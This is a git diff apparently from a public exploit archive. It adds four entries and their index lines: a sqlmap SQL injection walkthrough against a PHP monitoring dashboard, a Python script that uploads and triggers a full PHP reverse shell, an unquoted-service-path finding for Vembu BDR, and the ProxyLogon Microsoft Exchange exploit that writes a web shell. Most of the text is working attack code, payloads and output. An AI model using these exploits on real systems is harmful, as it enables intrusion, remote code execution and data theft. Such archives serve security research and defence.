diff --git a/exploits/php/webapps/49639.txt b/exploits/php/webapps/49639.txt new file mode 100644 index 000000000..973f218d8 --- /dev/null +++ b/exploits/php/webapps/49639.txt @@ -0,0 +1,41 @@ +# Exploit Title: Monitoring System (Dashboard) 1.0 - 'uname' SQL Injection +# Exploit Author: Richard Jones +# Date: 2021-01-26 +# Vendor Homepage: https://www.sourcecodester.com/php/11741/monitoring-system-dashboard.html +# Software Link: https://www.sourcecodester.com/download-code?nid=11741&title=Monitoring+System+%28Dashboard%29+using+PHP+with+Source+Code +# Version: 1.0 +# Tested On: Windows 10 Home 19041 (x64_86) + XAMPP 7.2.34 + +Steps. + +1. Run sqlmap +"sqlmap -u "http://localhost/asistorage/login.php" --data="uname=a&upass=w&btnlogin=" --batch + +2. +Parameter: uname (POST) + Type: time-based blind + Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) + Payload: uname=a' AND (SELECT 4539 FROM (SELECT(SLEEP(5)))zdoW) AND 'YWTS'='YWTS&upass=w&btnlogin= + + +Exploit paths: + +Database: +sqlmap -u "http://localhost/asistorage/login.php" --data="uname=a&upass=w&btnlogin=" --batch --dbms=mysql --dbs + +Tables: +sqlmap -u "http://localhost/asistorage/login.php" --data="uname=a&upass=w&btnlogin=" --batch --dbms=mysql -D asidatabase --tables +[11 tables] ++------------+ +| accounts | +| attendance | +| contacts | +| employee | +| gallery | +| msexcel | +| msppt | +| msword | +| oic | +| random | +| sign | ++------------+ \ No newline at end of file diff --git a/exploits/php/webapps/49640.py b/exploits/php/webapps/49640.py new file mode 100755 index 000000000..94bb08c71 --- /dev/null +++ b/exploits/php/webapps/49640.py @@ -0,0 +1,263 @@ +# Exploit Title: Monitoring System (Dashboard) 1.0 - File Upload RCE (Authenticated) +# Exploit Author: Richard Jones +# Date: 2021-03-11 +# Vendor Homepage: https://www.sourcecodester.com/php/11741/monitoring-system-dashboard.html +# Software Link: https://www.sourcecodester.com/download-code?nid=11741&title=Monitoring+System+%28Dashboard%29+using+PHP+with+Source+Code +# Version: 1.0 +# Tested On: Windows 10 Home 19041 (x64_86) + XAMPP 7.2.34 + + +# Usage. +# Change Target_IP, REV_IP, REV_PORT to your own + + +import requests + +def main(): + + ##### Change info here ##### + TARGET_IP="127.0.0.1" + REV_IP="127.0.0.1" + REV_PORT=9999 + ############################ + + LOGIN="/asistorage/login.php" + MAILING_LIST="/asistorage/modules/random/index.php?view=add" + UPLOAD_URL="/asistorage/modules/random/upload.php" + VIEW_ITEM="/asistorage/modules/random/index.php" + CALL_URL="/asistorage/modules/random/uploads/" + + + + s = requests.Session() + + def phpshell(): + return """ + array('pipe', 'r'), // shell can read from STDIN + 1 => array('pipe', 'w'), // shell can write to STDOUT + 2 => array('pipe', 'w') // shell can write to STDERR + ); + private $options = array(); // proc_open() options + private $buffer = 1024; // read/write buffer size + private $clen = 0; // command length + private $error = false; // stream read/write error + public function __construct($addr, $port) { + $this->addr = $addr; + $this->port = $port; + if (stripos(PHP_OS, 'LINUX') !== false) { // same for macOS + $this->os = 'LINUX'; + $this->shell = '/bin/sh'; + } else if (stripos(PHP_OS, 'WIN32') !== false || stripos(PHP_OS, 'WINNT') !== false || stripos(PHP_OS, 'WINDOWS') !== false) { + $this->os = 'WINDOWS'; + $this->shell = 'cmd.exe'; + $this->options['bypass_shell'] = true; // we do not want a shell within a shell + } else { + echo "SYS_ERROR: Underlying operating system is not supported, script will now exit...\n"; + exit(0); + } + } + private function daemonize() { + set_time_limit(0); // do not impose the script execution time limit + if (!function_exists('pcntl_fork')) { + echo "DAEMONIZE: pcntl_fork() does not exists, moving on...\n"; + } else { + if (($pid = pcntl_fork()) < 0) { + echo "DAEMONIZE: Cannot fork off the parent process, moving on...\n"; + } else if ($pid > 0) { + echo "DAEMONIZE: Child process forked off successfully, parent process will now exit...\n"; + exit(0); + } else if (posix_setsid() < 0) { // once daemonized you will no longer see the script's dump + echo "DAEMONIZE: Forked off the parent process but cannot set a new SID, moving on as an orphan...\n"; + } else { + echo "DAEMONIZE: Completed successfully!\n"; + } + } + umask(0); // set the file/directory permissions - 666 for files and 777 for directories + } + private function read($stream, $name, $buffer) { + if (($data = @fread($stream, $buffer)) === false) { // suppress an error when reading from a closed blocking stream + $this->error = true; // set global error flag + echo "STRM_ERROR: Cannot read from ${name}, script will now exit...\n"; + } + return $data; + } + private function write($stream, $name, $data) { + if (($bytes = @fwrite($stream, $data)) === false) { // suppress an error when writing to a closed blocking stream + $this->error = true; // set global error flag + echo "STRM_ERROR: Cannot write to ${name}, script will now exit...\n"; + } + return $bytes; + } + // read/write method for non-blocking streams + private function rw($input, $output, $iname, $oname) { + while (($data = $this->read($input, $iname, $this->buffer)) && $this->write($output, $oname, $data)) { + echo $data; // script's dump + if ($this->os === 'WINDOWS' && $oname === 'STDIN') { $this->clen += strlen($data); } // calculate the command length + } + } + // read/write method for blocking streams (e.g. for STDOUT and STDERR on Windows OS) + // we must read the exact byte length from a stream and not a single byte more + private function brw($input, $output, $iname, $oname) { + $size = fstat($input)['size']; + if ($this->os === 'WINDOWS' && $iname === 'STDOUT' && $this->clen) { // for some reason Windows OS pipes STDIN into STDOUT + $size -= $this->offset($input, $iname, $this->clen); // we do not like that + $this->clen = 0; + } + $fragments = ceil($size / $this->buffer); // number of fragments to read + $remainder = $size % $this->buffer; // size of the last fragment if it is less than the buffer size + while ($fragments && ($data = $this->read($input, $iname, $remainder && $fragments-- == 1 ? $remainder : $this->buffer)) && $this->write($output, $oname, $data)) { + echo $data; // script's dump + } + } + private function offset($stream, $name, $offset) { + $total = $offset; + while ($offset > 0 && $this->read($stream, $name, $offset >= $this->buffer ? $this->buffer : $offset)) { // discard the data from a stream + $offset -= $this->buffer; + } + return $offset > 0 ? $total - $offset : $total; + } + public function run() { + $this->daemonize(); + + // ----- SOCKET BEGIN ----- + $socket = @fsockopen($this->addr, $this->port, $errno, $errstr, 30); + if (!$socket) { + echo "SOC_ERROR: {$errno}: {$errstr}\n"; + } else { + stream_set_blocking($socket, false); // set the socket stream to non-blocking mode | returns 'true' on Windows OS + + // ----- SHELL BEGIN ----- + $process = proc_open($this->shell, $this->descriptorspec, $pipes, '/', null, $this->options); + if (!$process) { + echo "PROC_ERROR: Cannot start the shell\n"; + } else { + foreach ($pipes as $pipe) { + stream_set_blocking($pipe, false); // set the shell streams to non-blocking mode | returns 'false' on Windows OS + } + + // ----- WORK BEGIN ----- + fwrite($socket, "SOCKET: Shell has connected! PID: " . proc_get_status($process)['pid'] . "\n"); + while (!$this->error) { + if (feof($socket)) { // check for end-of-file on SOCKET + echo "SOC_ERROR: Shell connection has been terminated\n"; break; + } else if (feof($pipes[1]) || !proc_get_status($process)['running']) { // check for end-of-file on STDOUT or if process is still running + echo "PROC_ERROR: Shell process has been terminated\n"; break; // feof() does not work with blocking streams + } // use proc_get_status() instead + $streams = array( + 'read' => array($socket, $pipes[1], $pipes[2]), // SOCKET | STDOUT | STDERR + 'write' => null, + 'except' => null + ); + $num_changed_streams = stream_select($streams['read'], $streams['write'], $streams['except'], null); // wait for stream changes | will not wait on Windows OS + if ($num_changed_streams === false) { + echo "STRM_ERROR: stream_select() failed\n"; break; + } else if ($num_changed_streams > 0) { + if ($this->os === 'LINUX') { + if (in_array($socket , $streams['read'])) { $this->rw($socket , $pipes[0], 'SOCKET', 'STDIN' ); } // read from SOCKET and write to STDIN + if (in_array($pipes[2], $streams['read'])) { $this->rw($pipes[2], $socket , 'STDERR', 'SOCKET'); } // read from STDERR and write to SOCKET + if (in_array($pipes[1], $streams['read'])) { $this->rw($pipes[1], $socket , 'STDOUT', 'SOCKET'); } // read from STDOUT and write to SOCKET + } else if ($this->os === 'WINDOWS') { + // order is important + if (in_array($socket, $streams['read'])) { $this->rw ($socket , $pipes[0], 'SOCKET', 'STDIN' ); } // read from SOCKET and write to STDIN + if (fstat($pipes[2])['size']/*-------*/) { $this->brw($pipes[2], $socket , 'STDERR', 'SOCKET'); } // read from STDERR and write to SOCKET + if (fstat($pipes[1])['size']/*-------*/) { $this->brw($pipes[1], $socket , 'STDOUT', 'SOCKET'); } // read from STDOUT and write to SOCKET + } + } + } + // ------ WORK END ------ + + foreach ($pipes as $pipe) { + fclose($pipe); + } + proc_close($process); + } + // ------ SHELL END ------ + + fclose($socket); + } + // ------ SOCKET END ------ + + } +} +// change the host address and/or port number as necessary +$reverse_shell = new Shell('OLDIP', OLDPORT); +$reverse_shell->Run(); +?>""" + + def login(url,username, password): + try: + data = { + "uname":username, + "upass":password, + "btnlogin":"" + } + + r = s.post(url,data=data, verify=False) + page = r.text + if "Invalid Username or Password, please try again." in page: + return False + else: + return True + except : + return False + + def uploadShell(url): + s.get(f"{url}{MAILING_LIST}") # Call page + + fileData = { + 'uploaded_file':("rev.php",str(phpshell().replace("OLDIP", REV_IP).replace("OLDPORT", str(REV_PORT))).encode(), "application/octet-stream")} + data={ + "pname":"", + "pname":"a", + 'cutoff':'', + 'cutoff':'a', + 'projectname':'', + 'type':'a', + 'projectname':'', + 'dsend':'2029-03-19', + 'desc':'a', + 'MAX_FILE_SIZE':100000, + 'Uploader':'', + } + up_url=f"{url}{UPLOAD_URL}" + r = s.post(up_url, files=fileData,data=data, verify=False) + if r.status_code == 200: + print("shell uploaded") + else: + print("Shell upload failed") + exit(0) + r = s.get(f"{url}{VIEW_ITEM}") + page = r.text + DL_URL=page.split("download.php?filename=")[1].split("\">")[0] + return DL_URL + +#Login + base_url=f"http://{TARGET_IP}" + login_url=f"{base_url}{LOGIN}" + b=login(login_url, "jim", "jim") + if not b: + print("Login failed, Try again...") + exit(0) + +#CAll shell + base=f"{base_url}" + CALL_URL_PART=uploadShell(base) + c_url=f"{base}{CALL_URL}{CALL_URL_PART}" + s.get(c_url) + #Shell can be found at http:/TARGET//asistorage/modules/random/uploads/ + +if __name__ == "__main__": + main() \ No newline at end of file diff --git a/exploits/windows/local/49641.txt b/exploits/windows/local/49641.txt new file mode 100644 index 000000000..d52bc6508 --- /dev/null +++ b/exploits/windows/local/49641.txt @@ -0,0 +1,57 @@ +# Exploit Title: Vembu BDR 4.2.0.1 U1 - Multiple Unquoted Service Paths +# Date: 2020-11-6 +# Exploit Author: Mohammed Alshehri +# Vendor Homepage: https://www.vembu.com/ +# Software Link: https://sg-build-release.s3.amazonaws.com/BDRSuite/V420/4202020051312/Vembu_BDR_Backup_Server_Setup_4_2_0_1_U1_GA.exe +# Version: Version 4.2.0.1 U1 +# Tested on: Microsoft Windows 10 Education - 10.0.17763 N/A Build 17763 + + +# Service info: +C:\Users\m507>sc qc "hsflowd" +[SC] QueryServiceConfig SUCCESS + +SERVICE_NAME: hsflowd + TYPE : 10 WIN32_OWN_PROCESS + START_TYPE : 2 AUTO_START + ERROR_CONTROL : 1 NORMAL + BINARY_PATH_NAME : C:\Program Files\Vembu\VembuBDR\..\VembuBDR360Agent\bin\hsflowd.exe + LOAD_ORDER_GROUP : + TAG : 0 + DISPLAY_NAME : Host_sFlow_Agent + DEPENDENCIES : + SERVICE_START_NAME : LocalSystem + +C:\Users\m507>sc qc "VembuBDR360Agent" +[SC] QueryServiceConfig SUCCESS + +SERVICE_NAME: VembuBDR360Agent + TYPE : 10 WIN32_OWN_PROCESS + START_TYPE : 2 AUTO_START + ERROR_CONTROL : 1 NORMAL + BINARY_PATH_NAME : C:\Program Files\Vembu\VembuBDR\..\VembuBDR360Agent\bin\VembuBDR360Agent.exe + LOAD_ORDER_GROUP : + TAG : 0 + DISPLAY_NAME : VembuBDR360Agent + DEPENDENCIES : + SERVICE_START_NAME : LocalSystem + +C:\Users\m507>sc qc "VembuOffice365Agent" +[SC] QueryServiceConfig SUCCESS + +SERVICE_NAME: VembuOffice365Agent + TYPE : 10 WIN32_OWN_PROCESS + START_TYPE : 2 AUTO_START + ERROR_CONTROL : 1 NORMAL + BINARY_PATH_NAME : C:\Program Files\Vembu\VembuBDR\..\VembuOffice365Agent\bin\VembuOffice365Agent.exe + LOAD_ORDER_GROUP : + TAG : 0 + DISPLAY_NAME : VembuOffice365Agent + DEPENDENCIES : + SERVICE_START_NAME : LocalSystem + +C:\Users\m507> + + +# Exploit: +This vulnerability could permit executing code during startup or reboot with the escalated privileges. \ No newline at end of file diff --git a/exploits/windows/webapps/49637.py b/exploits/windows/webapps/49637.py new file mode 100755 index 000000000..77e5d3a06 --- /dev/null +++ b/exploits/windows/webapps/49637.py @@ -0,0 +1,176 @@ +# Exploit Title: Microsoft Exchange 2019 - SSRF to Arbitrary File Write (Proxylogon) +# Date: 2021-03-10 +# Exploit Author: testanull +# Vendor Homepage: https://www.microsoft.com +# Version: MS Exchange Server 2013, 2016, 2019 +# CVE: 2021-26855, 2021-27065 + +import requests +from urllib3.exceptions import InsecureRequestWarning +import random +import string +import sys + + +def id_generator(size=6, chars=string.ascii_lowercase + string.digits): + return ''.join(random.choice(chars) for _ in range(size)) + +if len(sys.argv) < 2: + print("Usage: python PoC.py ") + print("Example: python PoC.py mail.evil.corp haxor@evil.corp") + exit() +requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning) +target = sys.argv[1] +email = sys.argv[2] +random_name = id_generator(3) + ".js" +user_agent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36" + +shell_path = "Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\ahihi.aspx" +shell_absolute_path = "\\\\127.0.0.1\\c$\\%s" % shell_path + +shell_content = '' +legacyDnPatchByte = "68747470733a2f2f696d6775722e636f6d2f612f7a54646e5378670a0a0a0a0a0a0a0a" +autoDiscoverBody = """ + + %s http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a + + +""" % email + +print("Attacking target " + target) +print("=============================") +print(legacyDnPatchByte.decode('hex')) +FQDN = "EXCHANGE" +ct = requests.get("https://%s/ecp/%s" % (target, random_name), headers={"Cookie": "X-BEResource=localhost~1942062522", + "User-Agent": user_agent}, + verify=False) +if "X-CalculatedBETarget" in ct.headers and "X-FEServer" in ct.headers: + FQDN = ct.headers["X-FEServer"] + +ct = requests.post("https://%s/ecp/%s" % (target, random_name), headers={ + "Cookie": "X-BEResource=%s/autodiscover/autodiscover.xml?a=~1942062522;" % FQDN, + "Content-Type": "text/xml", + "User-Agent": user_agent}, + data=autoDiscoverBody, + verify=False + ) +if ct.status_code != 200: + print("Autodiscover Error!") + exit() +if "" not in ct.content: + print("Can not get LegacyDN!") + exit() + +legacyDn = ct.content.split("")[1].split("")[0] +print("Got DN: " + legacyDn) + +mapi_body = legacyDn + "\x00\x00\x00\x00\x00\xe4\x04\x00\x00\x09\x04\x00\x00\x09\x04\x00\x00\x00\x00\x00\x00" + +ct = requests.post("https://%s/ecp/%s" % (target, random_name), headers={ + "Cookie": "X-BEResource=Admin@%s:444/mapi/emsmdb?MailboxId=f26bc937-b7b3-4402-b890-96c46713e5d5@exchange.lab&a=~1942062522;" % FQDN, + "Content-Type": "application/mapi-http", + "User-Agent": user_agent +}, + data=mapi_body, + verify=False + ) +if ct.status_code != 200 or "act as owner of a UserMailbox" not in ct.content: + print("Mapi Error!") + exit() + +sid = ct.content.split("with SID ")[1].split(" and MasterAccountSid")[0] + +print("Got SID: " + sid) + +proxyLogon_request = """%sS-1-1-0S-1-5-2S-1-5-11S-1-5-15S-1-5-5-0-6948923 +""" % sid + +ct = requests.post("https://%s/ecp/%s" % (target, random_name), headers={ + "Cookie": "X-BEResource=Admin@%s:444/ecp/proxyLogon.ecp?a=~1942062522;" % FQDN, + "Content-Type": "text/xml", + "User-Agent": user_agent +}, + data=proxyLogon_request, + verify=False + ) +if ct.status_code != 241 or not "set-cookie" in ct.headers: + print("Proxylogon Error!") + exit() + +sess_id = ct.headers['set-cookie'].split("ASP.NET_SessionId=")[1].split(";")[0] + +msExchEcpCanary = ct.headers['set-cookie'].split("msExchEcpCanary=")[1].split(";")[0] +print("Got session id: " + sess_id) +print("Got canary: " + msExchEcpCanary) + +ct = requests.get("https://%s/ecp/%s" % (target, random_name), headers={ + "Cookie": "X-BEResource=Admin@%s:444/ecp/about.aspx?a=~1942062522; ASP.NET_SessionId=%s; msExchEcpCanary=%s" % ( + FQDN, sess_id, msExchEcpCanary), + "User-Agent": user_agent +}, + verify=False + ) +if ct.status_code != 200: + print("Wrong canary!") + print("Sometime we can skip this ...") +rbacRole = ct.content.split("RBAC roles: ")[1].split("")[0] +# print "Got rbacRole: "+ rbacRole + +print("=========== It means good to go!!!====") + +ct = requests.post("https://%s/ecp/%s" % (target, random_name), headers={ + "Cookie": "X-BEResource=Admin@%s:444/ecp/DDI/DDIService.svc/GetObject?schema=OABVirtualDirectory&msExchEcpCanary=%s&a=~1942062522; ASP.NET_SessionId=%s; msExchEcpCanary=%s" % ( + FQDN, msExchEcpCanary, sess_id, msExchEcpCanary), + "Content-Type": "application/json; charset=utf-8", + "User-Agent": user_agent + +}, + json={"filter": { + "Parameters": {"__type": "JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel", + "SelectedView": "", "SelectedVDirType": "All"}}, "sort": {}}, + verify=False + ) +if ct.status_code != 200: + print("GetOAB Error!") + exit() +oabId = ct.content.split('"RawIdentity":"')[1].split('"')[0] +print("Got OAB id: " + oabId) + +oab_json = {"identity": {"__type": "Identity:ECP", "DisplayName": "OAB (Default Web Site)", "RawIdentity": oabId}, + "properties": { + "Parameters": {"__type": "JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel", + "ExternalUrl": "http://ffff/#%s" % shell_content}}} + +ct = requests.post("https://%s/ecp/%s" % (target, random_name), headers={ + "Cookie": "X-BEResource=Admin@%s:444/ecp/DDI/DDIService.svc/SetObject?schema=OABVirtualDirectory&msExchEcpCanary=%s&a=~1942062522; ASP.NET_SessionId=%s; msExchEcpCanary=%s" % ( + FQDN, msExchEcpCanary, sess_id, msExchEcpCanary), + "Content-Type": "application/json; charset=utf-8", + "User-Agent": user_agent +}, + json=oab_json, + verify=False + ) +if ct.status_code != 200: + print("Set external url Error!") + exit() + +reset_oab_body = {"identity": {"__type": "Identity:ECP", "DisplayName": "OAB (Default Web Site)", "RawIdentity": oabId}, + "properties": { + "Parameters": {"__type": "JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel", + "FilePathName": shell_absolute_path}}} + +ct = requests.post("https://%s/ecp/%s" % (target, random_name), headers={ + "Cookie": "X-BEResource=Admin@%s:444/ecp/DDI/DDIService.svc/SetObject?schema=ResetOABVirtualDirectory&msExchEcpCanary=%s&a=~1942062522; ASP.NET_SessionId=%s; msExchEcpCanary=%s" % ( + FQDN, msExchEcpCanary, sess_id, msExchEcpCanary), + "Content-Type": "application/json; charset=utf-8", + "User-Agent": user_agent +}, + json=reset_oab_body, + verify=False + ) + +if ct.status_code != 200: + print("Write Shell Error!") + exit() + +print("Successful!") \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 0c2d6f6a4..f9ed55748 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -11281,6 +11281,7 @@ id,file,description,date,author,type,platform,port 49630,exploits/windows/local/49630.txt,"FreeLAN 2.2 - 'FreeLAN Service' Unquoted Service Path",2021-03-09,"Mohammed Alshehri",local,windows, 49631,exploits/windows/local/49631.txt,"Sandboxie Plus v0.7.2 - 'SbieSvc' Unquoted Service Path",2021-03-09,"Mohammed Alshehri",local,windows, 49632,exploits/windows/local/49632.txt,"bVPN 2.5.1 - 'waselvpnserv' Unquoted Service Path",2021-03-09,"Mohammed Alshehri",local,windows, +49641,exploits/windows/local/49641.txt,"Vembu BDR 4.2.0.1 U1 - Multiple Unquoted Service Paths",2021-03-12,"Mohammed Alshehri",local,windows, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 @@ -43823,3 +43824,6 @@ id,file,description,date,author,type,platform,port 49633,exploits/multiple/webapps/49633.py,"Atlassian JIRA 8.11.1 - User Enumeration",2021-03-10,"Dolev Farhi",webapps,multiple, 49634,exploits/hardware/webapps/49634.txt,"NuCom 11N Wireless Router 5.07.90 - Remote Privilege Escalation",2021-03-11,LiquidWorm,webapps,hardware, 49635,exploits/php/webapps/49635.txt,"MyBB OUGC Feedback Plugin 1.8.22 - Cross-Site Scripting",2021-03-11,0xB9,webapps,php, +49637,exploits/windows/webapps/49637.py,"Microsoft Exchange 2019 - SSRF to Arbitrary File Write (Proxylogon)",2021-03-11,testanull,webapps,windows, +49639,exploits/php/webapps/49639.txt,"Monitoring System (Dashboard) 1.0 - 'uname' SQL Injection",2021-03-12,"Richard Jones",webapps,php, +49640,exploits/php/webapps/49640.py,"Monitoring System (Dashboard) 1.0 - File Upload RCE (Authenticated)",2021-03-12,"Richard Jones",webapps,php,